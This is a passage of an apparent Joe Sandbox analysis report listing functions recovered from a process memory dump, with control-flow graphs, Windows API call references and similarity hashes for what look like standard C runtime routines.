                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: DecrementInterlocked
                                                                          • String ID:
                                                                          • API String ID: 3448037634-0
                                                                          • Opcode ID: 00439f1626edd72bd0af5b970ec258616a216b7a2b7fdb615faa444af6e7bb19
                                                                          • Instruction ID: 1b239839a70b8d7fb607ab07167d863608f0a887c273d3e0719ed6ee1259234c
                                                                          • Opcode Fuzzy Hash: 00439f1626edd72bd0af5b970ec258616a216b7a2b7fdb615faa444af6e7bb19
                                                                          • Instruction Fuzzy Hash: 63111E75B0071DA7DF509F79EC84B6ABBECAF40764F084416A608D7540DB74EA04DBB1
                                                                          Function 000F3C9E Relevance: 12.1, APIs: 8, Instructions: 58COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 447 f3c9e-f3cba InterlockedIncrement 448 f3cbf-f3cc7 447->448 449 f3cbc-f3cbd InterlockedIncrement 447->449 450 f3ccc-f3cd4 448->450 451 f3cc9-f3cca InterlockedIncrement 448->451 449->448 452 f3cd9-f3ce1 450->452 453 f3cd6-f3cd7 InterlockedIncrement 450->453 451->450 454 f3ce6-f3ce9 452->454 455 f3ce3-f3ce4 InterlockedIncrement 452->455 453->452 456 f3cf0-f3cf7 454->456 455->454 457 f3cf9-f3cfd 456->457 458 f3d02-f3d06 456->458 457->458 459 f3cff-f3d00 InterlockedIncrement 457->459 460 f3d08-f3d0d 458->460 461 f3d12-f3d18 458->461 459->458 460->461 462 f3d0f-f3d10 InterlockedIncrement 460->462 461->456 463 f3d1a-f3d2c InterlockedIncrement 461->463 462->461
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000F3CB0
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000F3CBD
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000F3CCA
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000F3CD7
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000F3CE4
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000F3D00
                                                                          • InterlockedIncrement.KERNEL32(00000000), ref: 000F3D10
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000F3D26
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: IncrementInterlocked
                                                                          • String ID:
                                                                          • API String ID: 3508698243-0
                                                                          • Opcode ID: e970a59ff4aedbba96b8f10b6ecd8591749b2e762d86cc1ae30448988dda7a7d
                                                                          • Instruction ID: a663c22f164a73a6ad08ec3837acba451318fb26083ec61ce80c5c70b7de9198
                                                                          • Opcode Fuzzy Hash: e970a59ff4aedbba96b8f10b6ecd8591749b2e762d86cc1ae30448988dda7a7d
                                                                          • Instruction Fuzzy Hash: 5A115B71B00219A7EB509B79DC84BA6BBECBF407A4F088016AA08D7500CB34EA04DBF0
                                                                          Function 000F6B63 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 464 f6b63-f6b9d 465 f6ba3-f6bb8 GetCPInfo 464->465 466 f6d02 464->466 468 f6bba-f6bbe 465->468 469 f6c18-f6c2b MultiByteToWideChar 465->469 467 f6d05-f6d0e 466->467 471 f6d10 call f10cc 467->471 468->469 470 f6bc0-f6bcb GetCPInfo 468->470 472 f6c2d-f6c2f 469->472 473 f6bf0 469->473 470->469 474 f6bcd-f6bd1 470->474 477 f6d15-f6d16 471->477 472->467 475 f6c4d 473->475 476 f6bf2-f6bf8 473->476 474->469 478 f6bd3-f6be0 474->478 479 f6c50-f6c53 475->479 476->475 480 f6bfa-f6c03 476->480 481 f6bee 478->481 482 f6be2-f6bed call f34b0 478->482 479->472 483 f6c55-f6c78 call f5320 MultiByteToWideChar 479->483 484 f6c05-f6c0e call f6aa0 480->484 485 f6c34 480->485 481->473 482->481 496 f6c7a-f6c7f 483->496 497 f6cf9-f6d01 call f5446 483->497 495 f6c48-f6c4b 484->495 498 f6c10-f6c16 484->498 486 f6c35 call f54b5 485->486 490 f6c3a-f6c3d 486->490 494 f6c3f 490->494 490->495 499 f6c45 494->499 495->479 501 f6c9e-f6ca7 496->501 502 f6c81-f6c97 WideCharToMultiByte 496->502 497->466 498->499 499->495 505 f6cbd-f6ccc call f3730 501->505 506 f6ca9-f6cbb WideCharToMultiByte 501->506 502->497 504 f6c99-f6c9c 502->504 504->497 505->497 509 f6cce-f6cde WideCharToMultiByte 505->509 506->497 506->505 510 f6cee-f6cf2 509->510 511 f6ce0-f6cec call f35ee 509->511 510->497 513 f6cf4-f6cf7 510->513 511->497 513->497
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,000F6012,00000000,?,?,?,?,?), ref: 000F6BAE
                                                                          • GetCPInfo.KERNEL32(?,00000001,?,?,?,?,000F6012,00000000,?), ref: 000F6BC7
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,000F6012,00000000,00000000,?,?,?,?,000F6012,00000000,?,?,?,?), ref: 000F6C25
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,000F6012,?,00000000,?,?,?,?,?,?,?,000F6012,00000000,?), ref: 000F6C74
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,000F6012), ref: 000F6C8F
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,000F6012), ref: 000F6CB5
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,000F6012), ref: 000F6CDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$Info
                                                                          • String ID:
                                                                          • API String ID: 1775632426-0
                                                                          • Opcode ID: 9af1a2128ed0f9f571557dd4cc33965301bb9a54208b717a4112efacc4bc4d95
                                                                          • Instruction ID: d449f0b02f538c4df47d8b953b51a2f87d2966e9be137b93900a9258c12b6947
                                                                          • Opcode Fuzzy Hash: 9af1a2128ed0f9f571557dd4cc33965301bb9a54208b717a4112efacc4bc4d95
                                                                          • Instruction Fuzzy Hash: 13516B3190021DEFCF619F95DC44CFEBBF9EB89320F204129EA94A6551D7329941EBA0
                                                                          Function 000F207E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 515 f207e-f2094 TlsGetValue 516 f20b7-f20c5 GetModuleHandleW 515->516 517 f2096-f209e 515->517 519 f20c7-f20d0 call f13e1 516->519 520 f20d2-f20d8 GetProcAddress 516->520 517->516 518 f20a0-f20ad TlsGetValue 517->518 518->516 527 f20af-f20b5 518->527 519->520 525 f20ea-f20ef 519->525 522 f20de-f20e0 520->522 522->525 526 f20e2-f20e7 522->526 526->525 527->522
                                                                          APIs
                                                                          • TlsGetValue.KERNEL32(00000000,?,000F20F7,00000000,000F3223,000FAFA8,00000000,00000314,?,000F1888,000FAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000F2090
                                                                          • TlsGetValue.KERNEL32(00000005,?,000F20F7,00000000,000F3223,000FAFA8,00000000,00000314,?,000F1888,000FAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000F20A7
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000F20F7,00000000,000F3223,000FAFA8,00000000,00000314,?,000F1888,000FAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000F20BD
                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 000F20D8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: Value$AddressHandleModuleProc
                                                                          • String ID: EncodePointer$KERNEL32.DLL
                                                                          • API String ID: 1929421221-3682587211
                                                                          • Opcode ID: e1e85dbd54c7f7faab0b72c5d53bb18ad06d59b311cec7935a49b84452fd56ef
                                                                          • Instruction ID: d40fde6ef198c573b4b97fc7e15fb33ae3ebb200eb7e321812cbdaea3b0f03e2
                                                                          • Opcode Fuzzy Hash: e1e85dbd54c7f7faab0b72c5d53bb18ad06d59b311cec7935a49b84452fd56ef
                                                                          • Instruction Fuzzy Hash: 61F0A432200609AB9B606B65DC44EBA3B9CAF413607158020FA18D6D72DF34DD41F7A2
                                                                          Function 000F20F9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • TlsGetValue.KERNEL32(00000000,?,000F2194,?,000F174F,00000003,?,?,?,?,?,?,000F10F6,?), ref: 000F210B
                                                                          • TlsGetValue.KERNEL32(00000005,?,000F2194,?,000F174F,00000003,?,?,?,?,?,?,000F10F6,?), ref: 000F2122
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000F2194,?,000F174F,00000003,?,?,?,?,?,?,000F10F6,?), ref: 000F2138
                                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 000F2153
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: Value$AddressHandleModuleProc
                                                                          • String ID: DecodePointer$KERNEL32.DLL
                                                                          • API String ID: 1929421221-629428536
                                                                          • Opcode ID: ac927028ff0d9dc8b260f8a7f3097569ff3a620f38dcd6d57ac1bd8b2457264b
                                                                          • Instruction ID: e07ec86cfd1a3d5b96b6e0f5c1c7a58cdff14de61e435e0f857bff74afaf7749
                                                                          • Opcode Fuzzy Hash: ac927028ff0d9dc8b260f8a7f3097569ff3a620f38dcd6d57ac1bd8b2457264b
                                                                          • Instruction Fuzzy Hash: 4FF0A43020011DAB9B50AB65EC44DBA3B9DBF113A0B548021FB1CD6D60DF34DD02FBA5
                                                                          Function 000F5E28 Relevance: 9.2, APIs: 6, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,000F926C,00000001,?,00000100,?,?,?,?,?,000F6012,00000000,?,?,?,?), ref: 000F5E57
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,000F6012,00000000,?,?,?,?,?,?,?,?,00000000), ref: 000F5E69
                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,000F6012,00000000,?,?), ref: 000F5ECE
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 000F5F38
                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000F5F46
                                                                          • GetStringTypeA.KERNEL32(?,?,?,?,?,00000100,?,?,?,?,?,000F6012,00000000,?,?,?), ref: 000F5FBB
                                                                            • Part of subcall function 000F6B63: GetCPInfo.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,000F6012,00000000,?,?,?,?,?), ref: 000F6BAE
                                                                            • Part of subcall function 000F6B63: GetCPInfo.KERNEL32(?,00000001,?,?,?,?,000F6012,00000000,?), ref: 000F6BC7
                                                                            • Part of subcall function 000F6B63: MultiByteToWideChar.KERNEL32(?,00000001,?,000F6012,?,00000000,?,?,?,?,?,?,?,000F6012,00000000,?), ref: 000F6C74
                                                                            • Part of subcall function 000F6B63: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,000F6012), ref: 000F6C8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$StringType$Info$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2250435928-0
                                                                          • Opcode ID: dd85b476ebc6a7861e89bcfe2c6a79556a75abf2f693d6c150faabf94a6e210f
                                                                          • Instruction ID: 131e0f345c10007fb98cdee5e533128eddf6e574731d516ba03b969089f5590e
                                                                          • Opcode Fuzzy Hash: dd85b476ebc6a7861e89bcfe2c6a79556a75abf2f693d6c150faabf94a6e210f
                                                                          • Instruction Fuzzy Hash: 89518A7150050EEFDB609F64DC819BE7BE9EB08352B244065FB04C7A51E734CEA4EB90
                                                                          Function 000F1DDE Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 000F1DF3
                                                                            • Part of subcall function 000F3730: Sleep.KERNEL32(00000000), ref: 000F3758
                                                                          • GetFileType.KERNEL32(00000040), ref: 000F1F1D
                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 000F1FA7
                                                                          • GetFileType.KERNEL32(00000000), ref: 000F1FB9
                                                                          • SetHandleCount.KERNEL32 ref: 000F2011
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType$CountInfoSleepStartup
                                                                          • String ID:
                                                                          • API String ID: 1302456922-0
                                                                          • Opcode ID: 923b6d54179b8e424c6d2e3551a80c2b5c08f3d9cb922c5a85176a8312b3cff4
                                                                          • Instruction ID: f1d2025e68a00e2bb3eaed0e4b8b6cc28b2d58d036d0cd8543aada8df909282b
                                                                          • Opcode Fuzzy Hash: 923b6d54179b8e424c6d2e3551a80c2b5c08f3d9cb922c5a85176a8312b3cff4
                                                                          • Instruction Fuzzy Hash: AC713971504349CFE7608B28D844BB9BBF0AF46334F298359D665DBAE2CB34D809EB11
                                                                          Function 000F283C Relevance: 7.6, APIs: 5, Instructions: 53timethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000F2873
                                                                          • GetCurrentProcessId.KERNEL32 ref: 000F287F
                                                                          • GetCurrentThreadId.KERNEL32 ref: 000F2887
                                                                          • GetTickCount.KERNEL32 ref: 000F288F
                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 000F289B
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                          • String ID:
                                                                          • API String ID: 1445889803-0
                                                                          • Opcode ID: 3abb048c3997faf9af2882f44be5ed584f6ff9054de40e32c8adda1330b6c6e9
                                                                          • Instruction ID: e358d04351f4f392b5e151afbe173be2d80d6aebe19b7942b78e69924d7804ca
                                                                          • Opcode Fuzzy Hash: 3abb048c3997faf9af2882f44be5ed584f6ff9054de40e32c8adda1330b6c6e9
                                                                          • Instruction Fuzzy Hash: 3B11A572E012289BEB609BB8ED486BEB7F4FF48391F524411E505E7610DE389D05E791
                                                                          Function 000F21A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • TlsFree.KERNEL32(0000000C,000F2616), ref: 000F21D3
                                                                          • DeleteCriticalSection.KERNEL32(00000000,00000000,KERNEL32.DLL,?,000F2616), ref: 000F298C
                                                                          • DeleteCriticalSection.KERNEL32(0000000C,KERNEL32.DLL,?,000F2616), ref: 000F29B6
                                                                            • Part of subcall function 000F20F9: TlsGetValue.KERNEL32(00000000,?,000F2194,?,000F174F,00000003,?,?,?,?,?,?,000F10F6,?), ref: 000F210B
                                                                            • Part of subcall function 000F20F9: TlsGetValue.KERNEL32(00000005,?,000F2194,?,000F174F,00000003,?,?,?,?,?,?,000F10F6,?), ref: 000F2122
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalDeleteSectionValue$Free
                                                                          • String ID: KERNEL32.DLL
                                                                          • API String ID: 3936257031-2576044830
                                                                          • Opcode ID: 13eb5ff87aa143cb5e90a4685bcffe162c62dbbf10f45b04e8c92b0f34ee0c17
                                                                          • Instruction ID: c5317381e9179bc41629b3aa7622bff62b1fdb8338ce255e4e1a3ca0a7811886
                                                                          • Opcode Fuzzy Hash: 13eb5ff87aa143cb5e90a4685bcffe162c62dbbf10f45b04e8c92b0f34ee0c17
                                                                          • Instruction Fuzzy Hash: 3701D272A4020857D2705B2CAC8457573D8BB52331B260319EABCD3DE1CB79AC82F661
                                                                          Function 000F143A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(mscoree.dll,?,000F1472,?,?,000F54EE,000000FF,0000001E,?,000F36FC,?,00000001,?,?,000F2A2A,00000018), ref: 000F1444
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000F1454
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 1646373207-1276376045
                                                                          • Opcode ID: 9d81ec24ef8134ffc61b0a7c3df27408411b96efd80e953c0241623826a3c66f
                                                                          • Instruction ID: b18ad34f41eacda11c187339af123bd00606d6a432c333e52ca9c95c11129650
                                                                          • Opcode Fuzzy Hash: 9d81ec24ef8134ffc61b0a7c3df27408411b96efd80e953c0241623826a3c66f
                                                                          • Instruction Fuzzy Hash: C7D0C93034024DBBABA05BB2EC49DBA7A9DAB81B543488114B70CD5860DE65D915F761
                                                                          Function 000F569D Relevance: 6.4, APIs: 5, Instructions: 181COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 000F54B5: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,000F36FC,?,00000001,?,?,000F2A2A,00000018,000F94C8,0000000C,000F2ABB), ref: 000F552C
                                                                          • GetLastError.KERNEL32(?,000F2D01,00000000,00000010,?,?,?,000F2D8D,?,000F94E8,0000000C,000F2DB9,?,?,000F151B,000F2058), ref: 000F5818
                                                                          • GetLastError.KERNEL32(?,000F2D01,00000000,00000010,?,?,?,000F2D8D,?,000F94E8,0000000C,000F2DB9,?,?,000F151B,000F2058), ref: 000F58A5
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 917199402-0
                                                                          • Opcode ID: 8d55eafba11a1560b06fb65531a85de4002e0f52a82ecf8434fdb7697af2c04e
                                                                          • Instruction ID: cad38a474cea3b6ebc663e62efdd8512e8d3afa9279cb2af088ff06cbb1062a7
                                                                          • Opcode Fuzzy Hash: 8d55eafba11a1560b06fb65531a85de4002e0f52a82ecf8434fdb7697af2c04e
                                                                          • Instruction Fuzzy Hash: 4E510371C04B1DABDB217B70AC056BE76A4EF507A2B204115FB50A7E92DF388942FB90
                                                                          Function 000F492A Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • HeapReAlloc.KERNEL32(00000000,-00000010,77E85D90,00000000,000F4E8A,77E85D90,?,00000000), ref: 000F4951
                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,77E85D90,00000000,000F4E8A,77E85D90,?,00000000), ref: 000F4987
                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 000F49A1
                                                                          • HeapFree.KERNEL32(00000000,?), ref: 000F49B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap$FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 3499195154-0
                                                                          • Opcode ID: 2d6c8b44bb77dae5f4de3c7bde7160728551435c07fd974156854a418a04db71
                                                                          • Instruction ID: 8a21037cfb4aa95aa459fb3d036345d3ac8b6975d03220052ee4211833f1e340
                                                                          • Opcode Fuzzy Hash: 2d6c8b44bb77dae5f4de3c7bde7160728551435c07fd974156854a418a04db71
                                                                          • Instruction Fuzzy Hash: 4C118F32608700AFE7619F24EC059377BF5E7947207208919EA9693DB1DB786844EF10